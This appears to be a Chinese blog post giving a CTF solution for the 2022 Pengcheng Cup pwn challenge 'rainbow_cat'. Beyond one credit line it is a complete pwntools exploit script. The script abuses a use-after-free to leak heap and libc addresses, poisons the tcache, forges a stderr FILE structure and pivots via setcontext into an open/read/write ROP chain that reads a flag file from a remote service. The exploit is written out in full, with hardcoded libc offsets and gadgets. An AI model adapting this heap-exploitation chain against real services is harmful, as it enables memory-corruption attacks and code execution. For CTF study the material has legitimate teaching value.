2022 鹏城杯 pwn rainbow_cat

我也不知道我是怎么搞出来的，学技术还得看winmt大师博客https://www.cnblogs.com/winmt/articles/16440009.html
from pwn import*
context(os='linux',arch='amd64',log_level='debug')

#s = process('./rainbowcat')
s = remote('192.168.1.102',9999)
libc = ELF('./libc-2.33.so')

def add(index):
	s.sendlineafter(b'Your choice >> ', b'1')
	s.sendlineafter(b'Which cat do you want to get? ', str(index))

def delete(index):
	s.sendlineafter(b'Your choice >> ', b'2')
	s.sendlineafter(b'Which one do you want to abandon? ', str(index))

def show(index):
	s.sendlineafter(b'Your choice >> ', b'3')
	s.sendlineafter(b'Choose a cat to show name: ', str(index))

def edit(index,content):	
	s.sendlineafter(b'Your choice >> ', b'4')
	s.sendlineafter(b'Which one?', str(index))
	s.sendafter(b'Rename the cat: ', content)

# 0 heap_base + 0x90
# 1 heap_base + 0x10

for i in range(7):
	add(0)

add(1)
add(2)

for i in range(7):
	delete(0)
	edit(0, b'a'*0x10)

delete(0)
show(0)

s.recvuntil(b'Name:')
heap_base = u64(s.recv(6).ljust(8,b'\x00')) << 12
success('heap_base=>' + hex(heap_base))

edit(0, p64((heap_base+0x10)^(heap_base >> 12)))

add(0)
add(1)

for i in range(7):
	delete(1)
	edit(1, p64(8) + b'a'*8)

delete(1)

show(1)
s.recvuntil(b'Name:')
libc_base = u64(s.recv(6).ljust(8,b'\x00')) - 0x1e0c00
success('libc_base=>' + hex(libc_base))

__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
_IO_2_1_stderr_ = libc_base + libc.sym['_IO_2_1_stderr_']
_IO_str_jumps = libc_base + 0x1e2560
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
_IO_stdfile_2_lock = libc_base + 0x1e3660

pop_rdi_ret = libc_base + 0x0000000000028a55
pop_rsi_ret = libc_base + 0x000000000002a4cf
pop_rdx_ret = libc_base + 0x00000000000c7f32
pop_rax_ret = libc_base + 0x0000000000044c70
syscall_ret = libc_base + 0x000000000006105a
ret = libc_base + 0x0000000000026699
magic = libc_base + 0x000000000014a0a0

fake_IO_stderr_addr = heap_base + 0x10
rop = heap_base + 0x500

edit(1, p64(0)*2)

delete(0)
edit(0, b'a'*0x10)
delete(0)

edit(0, p64((heap_base+0x90)^(heap_base >> 12)))
add(0)
add(0)

edit(1, p64(1))
edit(0, p64(heap_base+0x2a0))
add(2)
#######  _IO_2_1_stderr_._chain => heap_base + 0x10
edit(1, p64(7))
delete(2)
edit(2, p64((_IO_2_1_stderr_+0x60-0x10)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2c0))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x290)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x2e0))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2b0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x300))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2d0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x320))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x2f0)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x340))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x310)^(heap_base >> 12)) + p64(heap_base + 0x10))
edit(0, p64(heap_base+0x360))
add(2)

edit(1, p64(7))
delete(2)
edit(2, p64((heap_base+0x330)^(heap_base >> 12)) + p64(heap_base + 0x10))

edit(1, p64(0))
edit(0, p64(0))

add(2)

#####  prepare for malloc   free  memcpy

edit(1, p64(1))
edit(0, p64(heap_base + 0x20))
add(2)
edit(2, p64(0) + p16(0) + p16(1))

edit(1, p64(1))
edit(0, p64(heap_base + 0x90 + 0x60))
add(2)
edit(2, p64(0) + p64(__free_hook))

#####
edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x20))
add(2)
edit(2, p64(0) + p64(0xffffffffffffffff))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xd0))
add(2)
edit(2, p64(0) + p64(_IO_str_jumps))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x80))
add(2)
edit(2, p64(0) + p64(_IO_stdfile_2_lock))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x30))
add(2)
edit(2, p64(0) + p64(fake_IO_stderr_addr + 0x100))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x40))
add(2)
edit(2, p64(fake_IO_stderr_addr + 0x140) + p64(0))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x100))
add(2)
edit(2, p64(magic) + p64(heap_base + 0x10 + 0x1f0))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0xf0))
add(2)
edit(2, p64(0) + p64(0x21))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x110))
add(2)
edit(2, p64(0) + p64(0x21))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x210))
add(2)
edit(2, p64(setcontext_61))

edit(1, p64(1))
edit(0, p64(heap_base + 0x10 + 0x1f0 + 0xa0))
add(2)
edit(2, p64(rop) + p64(ret))

###### rop

edit(1, p64(1))
edit(0, p64(rop+0x100))
add(2)
edit(2, b'./flag\x00')

edit(1, p64(1))
edit(0, p64(rop))
add(2)
edit(2, p64(pop_rdi_ret) + p64(rop+0x100))

edit(1, p64(1))
edit(0, p64(rop+0x10))
add(2)
edit(2, p64(pop_rsi_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x20))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x30))
add(2)
edit(2, p64(pop_rax_ret) + p64(2))

edit(1, p64(1))
edit(0, p64(rop+0x40))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

edit(1, p64(1))
edit(0, p64(rop+0x50))
add(2)
edit(2, p64(pop_rdi_ret) + p64(3))

edit(1, p64(1))
edit(0, p64(rop+0x60))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))

edit(1, p64(1))
edit(0, p64(rop+0x70))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))

edit(1, p64(1))
edit(0, p64(rop+0x80))
add(2)
edit(2, p64(pop_rax_ret) + p64(0))

edit(1, p64(1))
edit(0, p64(rop+0x90))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

edit(1, p64(1))
edit(0, p64(rop+0xa0))
add(2)
edit(2, p64(pop_rdi_ret) + p64(1))

edit(1, p64(1))
edit(0, p64(rop+0xb0))
add(2)
edit(2, p64(pop_rsi_ret) + p64(rop+0x200))

edit(1, p64(1))
edit(0, p64(rop+0xc0))
add(2)
edit(2, p64(pop_rdx_ret) + p64(0x50))

edit(1, p64(1))
edit(0, p64(rop+0xd0))
add(2)
edit(2, p64(pop_rax_ret) + p64(1))

edit(1, p64(1))
edit(0, p64(rop+0xe0))
add(2)
edit(2, p64(syscall_ret) + p64(ret))

#### tigger

edit(1, p64(1))
edit(0, p64(_IO_2_1_stderr_))

#gdb.attach(s)
#pause()

add(2)
s.interactive()
posted @ 2022-07-03 16:40 狒猩橙阅读(196) 评论(2) 编辑收藏举报
刷新页面返回顶部
狒猩橙

2022 鹏城杯 pwn rainbow_cat

2022 鹏城杯 pwn rainbow_cat

公告
